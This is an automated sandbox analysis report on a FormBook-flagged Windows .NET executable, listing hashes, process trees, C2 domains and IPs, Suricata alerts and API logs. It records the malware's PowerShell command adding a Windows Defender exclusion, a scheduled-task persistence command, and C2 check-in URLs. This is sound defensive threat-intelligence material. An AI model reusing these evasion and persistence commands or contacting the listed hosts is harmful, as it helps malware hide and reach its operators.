Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Jan. 11, 2022, 10:17 a.m.	Jan. 11, 2022, 10:27 a.m.

Size	882.5KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`97ccf6ebd6abe7786677f0e6e6b8aef0`
SHA256	`44ed69358c6ef98ffc0e4da5aee0692f74fd03b8a7ea7c5c3b08f427f32a45e5`
CRC32	`1CB5C1E2`
ssdeep	`24576:AWvuytDTmitq1QOIFXvm4PAT95scVREMZ:1uytOitq1QtV9PAT95NhZ`
PDB Path	CustomAttributeDa.pdb
Yara	PE_Header_Zero - PE File Signature Generic_Malware_Zero - Generic Malware IsPE32 - (no description) Is_DotNET_EXE - (no description) Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT Win32_Trojan_PWS_Net_1_Zero - Win32 Trojan PWS .NET Azorult

vbc.exe "C:\Users\test22\AppData\Local\Temp\vbc.exe"
2768
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\wLPRsknlyKFXuL.exe"
  2172
- schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wLPRsknlyKFXuL" /XML "C:\Users\test22\AppData\Local\Temp\tmpB188.tmp"
  2244
- vbc.exe "C:\Users\test22\AppData\Local\Temp\vbc.exe"
  2344

Name	Response	Post-Analysis Lookup
www.spacezanome.xyz	A 64.190.62.111	64.190.62.111
www.bsauksjon.com	A 160.124.105.200	160.124.105.200
www.elainemaxwellcoaching.com	A 64.98.145.30	64.98.145.30
www.digitalgoldcryptostock.net	CNAME digitalgoldcryptostock.net A 23.94.191.226	23.94.191.226
www.wisteria-pavilion.com	A 104.21.89.185 A 172.67.191.3	172.67.191.3
www.landbanking.global	CNAME landbanking.global A 192.99.206.41	192.99.206.41
www.comment-changer-sa-vie.com	A 154.196.7.103	154.196.7.103

IP Address	Status	Action
104.21.89.185	Active	Moloch
154.196.7.103	Active	Moloch
160.124.105.200	Active	Moloch
164.124.101.2	Active	Moloch
192.99.206.41	Active	Moloch
23.94.191.226	Active	Moloch
64.190.62.111	Active	Moloch
64.98.145.30	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49173 -> 104.21.89.185:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49173 -> 104.21.89.185:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49173 -> 104.21.89.185:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 64.190.62.111:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 64.190.62.111:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 64.190.62.111:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 64.190.62.111:80	2031088	ET HUNTING Request to .XYZ Domain with Minimal Headers	Potentially Bad Traffic
TCP 192.168.56.101:49174 -> 64.98.145.30:80	2221045	SURICATA HTTP Unexpected Request body	Generic Protocol Command Decode
TCP 192.168.56.101:49168 -> 160.124.105.200:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 160.124.105.200:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 160.124.105.200:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 23.94.191.226:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 23.94.191.226:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 23.94.191.226:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49171 -> 154.196.7.103:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49171 -> 154.196.7.103:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49171 -> 154.196.7.103:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 192.99.206.41:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 192.99.206.41:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 192.99.206.41:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW Jan. 11, 2022, 10:17 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 11, 2022, 10:17 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 11, 2022, 10:17 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 11, 2022, 10:17 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Jan. 11, 2022, 10:17 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 11, 2022, 10:17 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 11, 2022, 10:17 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Jan. 11, 2022, 10:17 a.m.			0	0
IsDebuggerPresent Jan. 11, 2022, 10:17 a.m.			0	0
IsDebuggerPresent Jan. 11, 2022, 10:17 a.m.			0	0

Command line console output was observed (10 events)

Time & API	Arguments	Status	Return
WriteConsoleW Jan. 11, 2022, 10:17 a.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW Jan. 11, 2022, 10:17 a.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW Jan. 11, 2022, 10:17 a.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Jan. 11, 2022, 10:17 a.m.	buffer: At line:1 char:17 console_handle: 0x00000047	1	1
WriteConsoleW Jan. 11, 2022, 10:17 a.m.	buffer: + Add-MpPreference <<<< -ExclusionPath C:\Users\test22\AppData\Roaming\wLPRskn console_handle: 0x00000053	1	1
WriteConsoleW Jan. 11, 2022, 10:17 a.m.	buffer: lyKFXuL.exe console_handle: 0x0000005f	1	1
WriteConsoleW Jan. 11, 2022, 10:17 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x0000006b	1	1
WriteConsoleW Jan. 11, 2022, 10:17 a.m.	buffer: mmandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW Jan. 11, 2022, 10:17 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000083	1	1
WriteConsoleW Jan. 11, 2022, 10:17 a.m.	buffer: SUCCESS: The scheduled task "Updates\wLPRsknlyKFXuL" has successfully been created. console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d68e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d6e68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d6e68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d6e68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d69e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d69e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d69e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d69e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d69e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d69e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d64a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d64a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d64a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d6e68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d6e68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d6e68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d6d68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d6e68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d6e68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d6e68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d6e68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d6e68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d6e68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d6e68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d65e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d65e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d65e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d65e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d65e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d65e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d65e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d65e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d65e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d65e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d65e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d65e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d65e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d65e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d7268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d7268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d7268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d7268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d7268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d7268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d7268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 11, 2022, 10:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d7268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

This executable has a PDB path (1 event)

pdb_path

CustomAttributeDa.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Jan. 11, 2022, 10:17 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.sdata

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (7 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.bsauksjon.com/nt3f/?GVIP=StlFUnk4wzjTnbp09ZFPbEIp4u0ry2qey7hFHFyv3YIn7p8uZqYxCMZfdHDqdFDBwTTpWzRm&tzr4=jlIDUdgX_ZnH9D
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.spacezanome.xyz/nt3f/?GVIP=qWpm9f79C0TxsxjVAMsIztBX9N23mT+I4zI/hudLTAuSmKBmbFIF9CbFrsQ9agqRRqtelvrr&tzr4=jlIDUdgX_ZnH9D
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.landbanking.global/nt3f/?GVIP=trjiMTZ0Wfi0S4aQlORMjDKEp+1PeSz+32WZEglPev4YoRsHgXI2ikz8+KhcX6E7cvIxl+eh&tzr4=jlIDUdgX_ZnH9D
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.comment-changer-sa-vie.com/nt3f/?GVIP=QNIPywOvUFlAC2QTWNjsCI3IpHtNKfuQ9uBpR80qgvQLcDduTPmxZ7XDh6SnVUeEy/HMRhaT&tzr4=jlIDUdgX_ZnH9D
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.digitalgoldcryptostock.net/nt3f/?GVIP=zOEqxmpAWea6eBSpoYfp9rSxecxdcTynEay3lJhDVIet1TR9Cb1V70uuJSMzSBpGSSab4V51&tzr4=jlIDUdgX_ZnH9D
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.wisteria-pavilion.com/nt3f/?GVIP=8ao14cF3C0VyHrVB9d81+eQUJ2NsI+J1YOOHWDEbCV/j+/CHV5hoHcyE4RcWwqVyYuRrdO73&tzr4=jlIDUdgX_ZnH9D
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.elainemaxwellcoaching.com/nt3f/?GVIP=WCGiuzTZendY8otT5ciItqlYc2TVe3pH9Q7CsMjG7CDTs2E/eL1aFK9BXSIG0VIhNkfSQ70p&tzr4=jlIDUdgX_ZnH9D

Performs some HTTP requests (7 events)

request	GET http://www.bsauksjon.com/nt3f/?GVIP=StlFUnk4wzjTnbp09ZFPbEIp4u0ry2qey7hFHFyv3YIn7p8uZqYxCMZfdHDqdFDBwTTpWzRm&tzr4=jlIDUdgX_ZnH9D
request	GET http://www.spacezanome.xyz/nt3f/?GVIP=qWpm9f79C0TxsxjVAMsIztBX9N23mT+I4zI/hudLTAuSmKBmbFIF9CbFrsQ9agqRRqtelvrr&tzr4=jlIDUdgX_ZnH9D
request	GET http://www.landbanking.global/nt3f/?GVIP=trjiMTZ0Wfi0S4aQlORMjDKEp+1PeSz+32WZEglPev4YoRsHgXI2ikz8+KhcX6E7cvIxl+eh&tzr4=jlIDUdgX_ZnH9D
request	GET http://www.comment-changer-sa-vie.com/nt3f/?GVIP=QNIPywOvUFlAC2QTWNjsCI3IpHtNKfuQ9uBpR80qgvQLcDduTPmxZ7XDh6SnVUeEy/HMRhaT&tzr4=jlIDUdgX_ZnH9D
request	GET http://www.digitalgoldcryptostock.net/nt3f/?GVIP=zOEqxmpAWea6eBSpoYfp9rSxecxdcTynEay3lJhDVIet1TR9Cb1V70uuJSMzSBpGSSab4V51&tzr4=jlIDUdgX_ZnH9D
request	GET http://www.wisteria-pavilion.com/nt3f/?GVIP=8ao14cF3C0VyHrVB9d81+eQUJ2NsI+J1YOOHWDEbCV/j+/CHV5hoHcyE4RcWwqVyYuRrdO73&tzr4=jlIDUdgX_ZnH9D
request	GET http://www.elainemaxwellcoaching.com/nt3f/?GVIP=WCGiuzTZendY8otT5ciItqlYc2TVe3pH9Q7CsMjG7CDTs2E/eL1aFK9BXSIG0VIhNkfSQ70p&tzr4=jlIDUdgX_ZnH9D

Allocates read-write-execute memory (usually to unpack itself) (50 out of 168 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2768 region_size: 1310720 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00640000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00740000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72e31000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72e32000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2768 region_size: 1048576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00aa0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00562000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00595000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0059b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00597000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0057c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ac0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0056a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0057a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0058a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00587000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2768 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ac1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73a22000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00586000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ac6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ac7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ac8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0057d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ac9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2768 region_size: 24576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00aca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ee0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ee1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 11, 2022, 10:17 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ee2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
